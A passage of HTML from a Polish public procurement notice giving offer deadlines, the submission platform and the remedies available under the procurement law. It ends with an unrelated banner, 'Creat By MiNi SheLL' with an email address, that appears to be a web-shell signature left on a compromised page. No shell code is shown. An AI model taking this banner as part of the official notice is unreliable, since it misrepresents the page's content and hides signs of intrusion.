class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-09-26 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/lasy_stuposiany</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-09-26 08:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 28 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Ze względu na ograniczenia znakowe prosimy zapoznać się z pełną treścią specyfikacji<br/>warunków zamówienia SWZ, która umieszczona jest na stronie https://platformazakupowa.pl/pn/lasy_stuposiany.<br/>Wykonawcy oraz innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu zamówienia oraz poniósł lub może ponieść<br/>szkodę w wyniku naruszenia przez Zamawiającego przepisów ustawy Pzp przysługują środki ochrony prawnej, o których<br/>mowa w Dziale IX Środki ochrony prawnej ustawy Pzp.<br/>Szczegółowe kwestie dotyczące postępowania skargowego zostały uregulowane zostały w art. 579 - 590 ustawy Pzp.<br/>Szczegóły zamówienia zawiera SWZ.<br/>12. Informacje o ofercie wariantowej, umowie ramowej i aukcji elektronicznej:<br/><br/>a. Zamawiający nie dopuszcza możliwości składania ofert wariantowych,<br/>b. Zamawiający nie przewiduje możliwości zawarcia umowy ramowej,<br/>c. Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej ani utworzenia<br/>dynamicznego systemu zakupów

Creat By MiNi SheLL
Email: jattceo@gmail.com